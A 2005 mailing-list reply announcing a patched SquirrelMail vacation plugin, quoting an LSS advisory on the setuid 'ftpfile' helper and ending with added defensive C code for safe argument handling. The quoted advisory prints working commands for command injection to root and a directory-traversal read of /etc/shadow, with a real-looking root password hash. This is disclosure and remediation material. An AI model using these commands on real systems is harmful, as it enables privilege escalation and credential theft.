Re: Squirrelmail vacation v0.15 local root exploit
From: p dont think (pdontthink@angrynerds.com)
Date: Thu Feb 03 2005 - 22:13:31 CST
All,
A new release of this plugin that addresses this exploit is now
available at:
http://www.squirrelmail.org/plugin_view.php?id=51
Due to the severity of the exploits in prior versions, upgrade is
highly recommended. Also, please keep in mind that while the
SquirrelMail team takes security very seriously, it cannot take full
responsibility for the plethora of third-party plugins, of which this is
one. LSS team: pleeeease let us know *before* you are going to make
your announcement next time.
- Paul Lesneiwski
> LSS Security Advisory #LSS-2005-01-03
> http://security.lss.hr
>
> ---
>
> Title : Squirrelmail vacation v0.15 local root exploit
> Advisory ID : LSS-2005-01-03
> Date : 10.01.2005.
> Advisory URL : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
> Impact : Privilege escalation and arbitrary file read
> Risk level : High
> Vulnerability type : Local
> Vendors contacted : No response from vendor
>
>
> ---
>
>
>
> ===[ Overview
>
> Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
> message to incoming email. That is commonly used to notify the sender of
> the receiver's absence. Vacation plugin specifically uses the Vacation program.
> Plugin can be downloaded from:
> http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz
>
>
>
> ===[ Vulnerability
>
> Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'.
> The program is used to access local files in user's home directory. There is
> a privilege escalation and arbitrary file read vulnerability in ftpfile.
> Command line arguments are passed to execve() function without checking
> for meta-characters, therefore making possible execution of commands as root.
>
> [ljuranic@laptop ljuranic]$ id
> uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
> [ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"
> /bin/cp: omitting directory `/root/0'
> uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
> [ljuranic@laptop ljuranic]$
>
> It is also possible to read restricted files (such as /etc/shadow), since
> ftpfile can copy a file from user's home directory to any other
> directory without checking file name for directory traversal attack.
>
> $ ftpfile localhost root root get ../../../../etc/shadow ./shadow
> ./shadow[ljuranic@laptop ljuranic]$ head ./shadow
> root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::
> bin:*:10929:0:99999:7:::
> daemon:*:10929:0:99999:7:::
> lp:*:10929:0:99999:7:::
> [ljuranic@laptop ljuranic]$
>
>
>
> ===[ Affected versions
>
> Squirrelmail Vacation v0.15 and previous versions.
>
>
>
> ===[ Fix
>
> Not available yet.
>
>
>
> ===[ PoC Exploit
>
> http://security.lss.hr/exploits/
>
>
>
> ===[ Credits
>
> Credits for this vulnerability go to Leon Juranic.
>
>
>
> ===[ LSS Security Contact
>
> LSS Security Team, <eXposed by LSS>
>
> WWW : http://security.lss.hr
> E-mail : security@LSS.hr
> Tel : +385 1 6129 775
>
>
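
The two flaws the advisory describes (unchecked meta-characters reaching a command, and no traversal check on the file name) can be closed in a setuid helper's argument handling as shown here. This is an added example, not code from the plugin or from the fixed release; the function names, the allow-list policy and the fixed PATH are assumptions.

```c
/* Added example: argument handling for a setuid file-copy helper.
   Helper names and the allow-list policy are assumptions, not plugin code. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_NAME 255

/* Accept a single path component made of [A-Za-z0-9._-] only.
   Rejects shell meta-characters, '/', "." and "..", and a leading '-'. */
int is_safe_name(const char *s)
{
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
                             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-";
    size_t n = strlen(s);
    if (n == 0 || n > MAX_NAME || s[0] == '-') return 0;
    if (strcmp(s, ".") == 0 || strcmp(s, "..") == 0) return 0;
    return strspn(s, ok) == n;
}

/* Join home and name into out; returns 0 on success, -1 if rejected. */
int build_path(const char *home, const char *name, char *out, size_t len)
{
    if (!is_safe_name(name)) return -1;
    int w = snprintf(out, len, "%s/%s", home, name);
    return (w < 0 || (size_t)w >= len) ? -1 : 0;
}

/* Copy src to dst with /bin/cp, passing argv directly so that no shell
   ever parses the arguments. Returns cp's exit status, or -1 on error. */
int run_copy(const char *src, const char *dst)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "cp", "--", (char *)src, (char *)dst, NULL };
        char *const envp[] = { "PATH=/bin:/usr/bin", NULL };
        execve("/bin/cp", argv, envp);
        _exit(127);  /* reached only if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Name validation alone does not stop a symlink inside the home directory from pointing elsewhere; performing the copy under the target user's uid instead of root covers that case.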